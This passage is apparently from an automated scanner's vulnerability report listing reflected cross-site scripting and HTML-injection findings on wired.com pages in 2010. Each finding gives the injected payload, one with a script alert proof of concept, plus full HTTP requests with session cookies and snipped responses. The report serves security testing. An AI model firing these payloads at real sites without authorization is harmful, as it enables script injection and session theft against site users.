Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:51 GMT
Date: Sun, 21 Nov 2010 23:06:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle c_multimedia31c8a"><a>c696540734e">
...[SNIP]...

1.105. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2008/11/gallery_vote

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26cdb"><script>alert(1)</script>0fe75b71068 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/lifestyle/multimedia/2008/11/gallery_vote?26cdb"><script>alert(1)</script>0fe75b71068=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:17 GMT
Date: Sun, 21 Nov 2010 23:06:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41448


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/lifestyle/multimedia/2008/11/gallery_vote?26cdb"><script>alert(1)</script>0fe75b71068=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.106. http://www.wired.com/culture/lifestyle/news/2005/01/66334 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66334

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 127a6"><a>a9774cc0e66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture127a6"><a>a9774cc0e66/lifestyle/news/2005/01/66334 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:18 GMT
Date: Sun, 21 Nov 2010 23:06:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture127a6"><a>a9774cc0e66 ss_lifestyle c_news">
...[SNIP]...

1.107. http://www.wired.com/culture/lifestyle/news/2005/01/66334 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66334

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a43"><a>9a2824aad23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle62a43"><a>9a2824aad23/news/2005/01/66334 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:35 GMT
Date: Sun, 21 Nov 2010 23:06:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle62a43"><a>9a2824aad23 c_news">
...[SNIP]...

1.108. http://www.wired.com/culture/lifestyle/news/2005/01/66334 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66334

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6c9a"><a>b4bd5c0f5f4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle/newsf6c9a"><a>b4bd5c0f5f4/2005/01/66334 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:52 GMT
Date: Sun, 21 Nov 2010 23:06:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle c_newsf6c9a"><a>b4bd5c0f5f4">
...[SNIP]...

1.109. http://www.wired.com/culture/lifestyle/news/2005/01/66359 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66359

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bee7"><a>1f9ffde2136 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture3bee7"><a>1f9ffde2136/lifestyle/news/2005/01/66359 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:22 GMT
Date: Sun, 21 Nov 2010 23:06:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture3bee7"><a>1f9ffde2136 ss_lifestyle c_news">
...[SNIP]...

1.110. http://www.wired.com/culture/lifestyle/news/2005/01/66359 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66359

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d26d"><a>83866788be7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle1d26d"><a>83866788be7/news/2005/01/66359 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:40 GMT
Date: Sun, 21 Nov 2010 23:06:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle1d26d"><a>83866788be7 c_news">
...[SNIP]...

1.111. http://www.wired.com/culture/lifestyle/news/2005/01/66359 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66359

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1fee"><a>4d894af57f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle/newsf1fee"><a>4d894af57f2/2005/01/66359 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:04 GMT
Date: Sun, 21 Nov 2010 23:07:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle c_newsf1fee"><a>4d894af57f2">
...[SNIP]...

1.112. http://www.wired.com/customerservice [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /customerservice

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 839c3"><a>d95b402d7c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /customerservice839c3"><a>d95b402d7c8 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29343
Vary: Accept-Encoding
Cache-Control: max-age=224
Expires: Mon, 22 Nov 2010 01:13:02 GMT
Date: Mon, 22 Nov 2010 01:09:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_customerservice839c3"><a>d95b402d7c8">
...[SNIP]...

1.113. http://www.wired.com/entertainment [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7ac8"><a>98e7490e5ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainmenta7ac8"><a>98e7490e5ae HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29320
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:45 GMT
Date: Mon, 22 Nov 2010 01:10:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainmenta7ac8"><a>98e7490e5ae">
...[SNIP]...

1.114. http://www.wired.com/entertainment/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5df5b"><a>b5f8392314c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment5df5b"><a>b5f8392314c/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=230
Expires: Sun, 21 Nov 2010 20:16:27 GMT
Date: Sun, 21 Nov 2010 20:12:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment5df5b"><a>b5f8392314c">
...[SNIP]...

1.115. http://www.wired.com/entertainment/hollywood [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/hollywood

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f82"><a>c6b1ca3f8f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment94f82"><a>c6b1ca3f8f7/hollywood HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29343
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:11:30 GMT
Date: Sun, 21 Nov 2010 23:07:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment94f82"><a>c6b1ca3f8f7 ss_hollywood">
...[SNIP]...

1.116. http://www.wired.com/entertainment/hollywood [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/hollywood

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce5fc"><a>d3f7037435e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/hollywoodce5fc"><a>d3f7037435e HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29343
Vary: Accept-Encoding
Cache-Control: max-age=574
Expires: Sun, 21 Nov 2010 23:17:52 GMT
Date: Sun, 21 Nov 2010 23:08:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_hollywoodce5fc"><a>d3f7037435e">
...[SNIP]...

1.117. http://www.wired.com/entertainment/music [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 224ea"><a>7c815694db5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment224ea"><a>7c815694db5/music HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29335
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:11:32 GMT
Date: Sun, 21 Nov 2010 23:07:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment224ea"><a>7c815694db5 ss_music">
...[SNIP]...

1.118. http://www.wired.com/entertainment/music [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c9b2"><a>b28c0d05be9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/music3c9b2"><a>b28c0d05be9 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29335
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:03 GMT
Date: Sun, 21 Nov 2010 23:08:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_music3c9b2"><a>b28c0d05be9">
...[SNIP]...

1.119. http://www.wired.com/entertainment/music/news/2004/04/63263 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2004/04/63263

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3385f"><a>f8dbe2114f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment3385f"><a>f8dbe2114f4/music/news/2004/04/63263 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:58 GMT
Date: Sun, 21 Nov 2010 23:06:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment3385f"><a>f8dbe2114f4 ss_music c_news">
...[SNIP]...

1.120. http://www.wired.com/entertainment/music/news/2004/04/63263 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2004/04/63263

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db81"><a>8eb418e94bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/music4db81"><a>8eb418e94bf/news/2004/04/63263 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
